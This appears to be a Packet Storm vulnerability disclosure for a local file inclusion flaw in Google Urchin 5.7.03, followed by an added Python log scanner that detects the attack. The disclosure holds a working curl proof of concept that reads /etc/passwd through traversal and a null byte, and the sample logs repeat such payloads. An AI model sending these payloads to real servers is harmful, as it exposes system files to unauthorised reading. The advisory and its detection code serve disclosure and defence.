Google Urchin 5.7.03 Local File Inclusion

2010-12-14T00:00:00
ID PACKETSTORM:96692
Type packetstorm
Reporter Kristian Hermansen
Modified 2010-12-14T00:00:00

Description

                                        
While fuzzing an Urchin web application, I discovered what appears to
be an LFI vulnerability. Neither Secunia nor Google / Urchin appear
to have reported this as a known issue. The problem lies in the gfid
parameter passed to urchin.cgi. This was tested on a somewhat
modified version of Urchin 5.7.03, but it appears that the gfid param
can be influenced given the results. I don't have the ability to test
further, but this appears valid and unpublished. Can anyone confirm
they see similar behavior in the same version or other versions?

PoC:
"""
$ curl -s -b '...cookie_data...' \
'https://host/path/urchin.cgi?profile=...&rid=13&cmd=svg&gfid=/../../../../../../../../../../../etc/passwd%00.html&ie5=.svg'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
...
"""
--
Kristian Erik Hermansen
http://www.linkedin.com/in/kristianhermansen
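For defenders reviewing web server logs, the following added example (not part of the original post and not Urchin code) flags urchin.cgi requests whose gfid value contains a parent-directory segment or a NUL byte, including double-encoded forms. The log lines, addresses, profile names and the benign gfid value are constructed assumptions; the real format of a legitimate gfid is not given in the report.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed access-log lines; addresses, profile names and the benign gfid value are made up.
SAMPLE_LOG = [
    '198.51.100.4 - - [14/Dec/2010:09:58:11 +0000] "GET /path/urchin.cgi?profile=demo&rid=13&cmd=svg&gfid=report-13&ie5=.svg HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Dec/2010:10:00:02 +0000] "GET /path/urchin.cgi?profile=demo&rid=13&cmd=svg&gfid=/../../../etc/passwd%00.html&ie5=.svg HTTP/1.1" 200 1432',
    '203.0.113.7 - - [14/Dec/2010:10:00:09 +0000] "GET /path/urchin.cgi?profile=demo&rid=13&cmd=svg&gfid=%252e%252e%252fetc%252fpasswd%2500.html HTTP/1.1" 200 1432',
    '198.51.100.9 - - [14/Dec/2010:10:01:40 +0000] "GET /other/app.cgi?file=../x HTTP/1.1" 404 210',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def decode_fully(value: bytes, rounds: int = 3) -> bytes:
    """Percent-decode repeatedly so double-encoded input (%252e, %2500) is normalised."""
    for _ in range(rounds):
        decoded = unquote_to_bytes(value)
        if decoded == value:
            break
        value = decoded
    return value


def gfid_findings(line: str) -> list:
    """Return the suspicious traits of the gfid parameter in one log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/urchin.cgi"):
        return []
    findings = []
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        if name != "gfid":
            continue
        value = decode_fully(raw.encode("ascii", "replace"))
        if b"\x00" in value:  # NUL used to cut off an appended suffix such as ".html"
            findings.append("null-byte")
        if b".." in value.replace(b"\\", b"/").split(b"/"):  # parent-directory segment
            findings.append("traversal")
    return findings


def scan(lines) -> dict:
    """Map 1-based line numbers to findings, skipping clean lines."""
    hits = {n: gfid_findings(line) for n, line in enumerate(lines, 1)}
    return {n: found for n, found in hits.items() if found}
```

A hit with a 200 status and a response size that differs from normal report output is the combination worth triaging first.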